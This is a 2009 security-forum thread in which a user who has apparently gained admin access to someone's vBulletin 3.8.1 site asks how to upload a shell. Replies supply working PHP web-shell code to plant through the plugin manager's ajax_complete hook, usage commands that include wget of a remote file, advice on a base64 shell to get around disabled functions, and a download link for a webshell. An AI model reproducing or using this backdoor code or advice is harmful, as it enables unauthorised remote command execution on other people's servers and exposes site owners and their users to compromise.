|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 151
Members: 0
Total: 151
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Any one have idea.. how to upload shell vbulletin 3.8.1 |
|
Posted: Tue Apr 14, 2009 9:26 am |
|
|
transfer |
Regular user |
|
|
Joined: Apr 14, 2009 |
Posts: 11 |
|
|
|
|
|
|
|
Hi guys..
Any one have idea.. how to upload shell vbulletin 3.8.1
I have got admin access one of the site.. any one guide me upload shell.. in site.
Thanks in advance. |
|
|
|
|
Posted: Tue Apr 14, 2009 5:22 pm |
|
|
capt |
Advanced user |
|
|
Joined: Nov 04, 2008 |
Posts: 232 |
|
|
|
|
|
|
|
Here is a tutorial that works pretty well depending on the permissions of the folders.
http://www.waraxe.us/ftopict-3964.html
An easy way as well is just to input some php code into the plugin manager under Ajax_complete for the hook location.
ex code:
Code: |
if(isset($_GET['lol'])){echo "<h1>lol</h1><pre>"; system($_GET['lol']);exit;}
|
use:
ajax.php?lol=cmd
some commands..
1.wget URL/file.ext
2.ls -la
3.cat filename
4.cd DIR
etc...
btw those are linux commands if u didnt notice |
|
|
|
|
|
nice but didnt work for me.. |
|
Posted: Thu Apr 16, 2009 11:27 am |
|
|
transfer |
Regular user |
|
|
Joined: Apr 14, 2009 |
Posts: 11 |
|
|
|
|
|
|
|
First thing i tryed as you said..
getting bellow error
Warning: system() has been disabled for security reasons in [path]/ajax.php(754) : eval()'d code on line 1
secone .. i did as per the tutorial.. seems issue with folder permessions..
am still finding the way.
Thanks |
|
|
|
|
Posted: Thu Apr 16, 2009 2:35 pm |
|
|
-AO- |
Advanced user |
|
|
Joined: Jul 15, 2008 |
Posts: 205 |
Location: United States |
|
|
|
|
|
|
Try to use b64 shell. It will edit php.ini to bypass disabled functions and safe mode. |
|
|
|
|
Posted: Thu Apr 16, 2009 7:01 pm |
|
|
capt |
Advanced user |
|
|
Joined: Nov 04, 2008 |
Posts: 232 |
|
|
|
|
|
|
|
Here is a webshell made by a good friend of mine. Use the code in the cmd.txt file and input that code where the php code belongs. Dont use the <?php ?> tags. Use the same hook_location "ajax_complete" and then connect using the webshell GUI and enter the site "http://thesite.com/ajax.php"
Webshell Download: http://rapidshare.com/files/222153261/Release.rar |
|
|
|
|
www.waraxe.us Forum Index -> Tools
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|